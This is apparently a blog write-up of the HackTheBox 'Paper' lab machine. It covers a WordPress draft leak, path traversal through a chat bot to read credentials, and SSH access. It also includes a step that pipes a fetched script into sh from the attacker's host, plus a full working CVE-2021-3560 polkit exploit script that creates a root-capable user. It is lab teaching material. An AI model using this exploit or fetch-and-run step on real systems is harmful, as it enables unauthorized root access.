Post

HackTheBox Paper Writeup

Posted
By x3ric
5 min read

Tackle the HackTheBox Paper Capture The Flag (CTF) challenge, an easy-level journey through web exploitation, subdomain enumeration, RCE, and privilege escalation. This concise writeup provides clear steps to help you develop essential Linux security skills through practical exercises.

Add Hosts

Edit the /etc/hosts file and add the following entries:

1

10.10.11.143 paper.htb office.paper.htb chat.office.paper.htb

This ensures that your system can resolve the domain names paper.htb to the correct IP address 10.10.10.100.

Script to add hosts automatically

1
2
3

ip="10.10.11.143"
domain="paper.htb office.paper.htb chat.office.paper.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV paper.htb

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29

Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-12 16:08 CEST
Nmap scan report for paper.htb (10.10.11.143)
Host is up (0.067s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
|   256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_  256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp  open  http     Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-title: HTTP Server Test Page powered by CentOS
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
443/tcp open  ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after:  2022-07-08T10:32:34
|_http-title: HTTP Server Test Page powered by CentOS
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_ssl-date: TLS randomness does not represent time
| http-methods: 
|_  Potentially risky methods: TRACE

Subdomain Enumeration

While inspecting the traffic, the office.paper subdomain is discovered. Use gobuster to enumerate additional subdomains:

1

gobuster vhost -u office.paper -w /usr/share/dict/SecLists/Discovery/DNS/subdomains-top1million-110000.txt

Exploiting WordPress CVE-2019-17671

Visit the following URL to exploit a known vulnerability in WordPress:

1

http://office.paper/?static=1

in it you can find http://chat.office.paper/register/xxxxxxxxxxxxxxxxx

Chat with the bot to explore further:

1
2

list ../../../home/dwight
file ../../../home/dwight/hubot/.env

Use the credentials found to SSH into the target:

1
2

ssh dwight@paper.htb
cat /home/dwight/user.txt

System Information Gathering with LinPEAS

Run LinPEAS to gather information for privilege escalation:

1
2
3
4

wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh
echo "now in the victim pc run -> curl "$(ip a | grep -A 2 "tun0:" | grep -oP '(?<=inet\s)\d+(\.\d+){3}')"/linpeas.sh | sh"
sudo python3 -m http.server 80
rm -rf linpeas.sh

Exploiting CVE-2021-3560 for Privilege Escalation

Paste the following script into the shell to exploit the vulnerability:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90

RED='\033[0;31m'
GREEN='\033[0;32m'
BLUE='\033[0;34m'
NC='\033[0m'
USR="pwn"
PASS="root"
TIME=""
FORCE="y"
function fetch_timing(){
    exec 3>&1 4>&2
    out=$( { time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:$USR string:$USR int32:1 2>&1 >/dev/null 2>&4 1>&3; } 2>&1 )
    tmp=$(echo $out | grep -i "real" | awk -F '.' '{print $2}')
    tmp_timing=$(echo ${tmp:0:$((${#tmp}-10))})
    exec 3>&- 4>&-
    echo $tmp_timing  
}
function calculate_timing(){ 
    tmp_timing=$(echo $1)
    t=$(awk "BEGIN {print `echo $tmp_timing/2`}")
    echo $t
}
function insert_user(){
    time_fetched=$(fetch_timing)
    timing=$(calculate_timing `echo "0.$time_fetched"`)
    if [[ $TIME ]]; then
        t=$TIME
    else
        t=$timing
    fi
    while ! id "$USR" &>/dev/null; do
        dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:$USR string:$USR int32:1 2>/dev/null & sleep `echo $t`s 2>/dev/null; kill $! 2>/dev/null
    done
    uid=$(id $USR | cut -d = -f2 | cut -d \( -f1)
    echo $uid,$t
}
function insert_pass(){
    ti=$(echo $1)
    u_id=$(echo $2)
    hash1=$(openssl passwd -5 `echo -n $PASS`)
    while true; do
        dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User$u_id org.freedesktop.Accounts.User.SetPassword string:`echo -n $hash1` string:GoldenEye 2>/dev/null & sleep `echo $ti`s 2>/dev/null; kill $! 2>/dev/null
        if [ $? -eq 0 ]; then
            break
        fi
    done
}
function exploit(){
    while true; do
        echo -e "${BLUE}[!]${NC} Inserting Username $USR..."
        ret=$(insert_user)
        t=$(echo $ret | cut -d , -f2)
        uid=$(echo $ret | cut -d , -f1)
        if id "$USR" &>/dev/null; then
            echo -e "${GREEN}[+]${NC} Inserted Username $USR with UID $uid!"
            echo -e "${BLUE}[!]${NC} Inserting password hash..."
            insert_pass $t $uid
            echo -e "${BLUE}[!]${NC} Password insertion attempted!"
            echo -e "${BLUE}[!]${NC} Try to login as the injected user using 'su - $USR'"
            echo -e "${BLUE}[!]${NC} If login fails, run the exploit again."
            echo -e "${BLUE}[!]${NC} If successful, use 'sudo bash' to gain root access!"
            break
        else
            echo -e "${RED}[x]${NC} Insertion of Username failed! Retrying..."
        fi
    done
}
if [[ "$FORCE" == "y" ]]; then 
    exploit
else
    echo -e "${BLUE}[!]${NC} Starting Vulnerability Checks..."
    dist=$(cat /etc/os-release | grep ^ID= | cut -d = -f2 | grep -i 'centos\|rhel\|fedora\|ubuntu\|debian')
    echo -e "${BLUE}[!]${NC} Detected Linux distribution as $dist"
    ac_service=$(dpkg -l | grep -i accountsservice || rpm -qa | grep -i accountsservice)
    gc_center=$(dpkg -l | grep -i gnome-control-center || rpm -qa | grep -i gnome-control-center)
    if [[ $ac_service && $gc_center ]]; then
        echo -e "${GREEN}[+]${NC} Accounts service and Gnome-Control-Center Installation Found!"
        polkit=$(dpkg -l | grep -i polkit | grep -i "0.105-26" || rpm -qa | grep -i polkit | grep -i '0.11[3-9]')
        if [[ $polkit ]]; then
            echo -e "${GREEN}[+]${NC} Polkit version appears to be vulnerable!"
            exploit
        else
            echo -e "${RED}[x]${NC} ERROR: Polkit version is not vulnerable!"
            echo -e "${BLUE}[!]${NC} Aborting Execution!"
            echo -e "${BLUE}[!]${NC} Use '-f=y' flag to force exploit."
        fi
    else
        echo -e "${RED}[x]${NC} ERROR: Accounts service and Gnome-Control-Center NOT found!"
        echo -e "${BLUE}[!]${NC} Aborting Execution!"
    fi
fi

After exploiting, check the root flag:

1

cat /root/root.txt
ctf
htb cft writeup linux wordpress cve-2021-3560
This post is licensed under CC BY 4.0 by the author.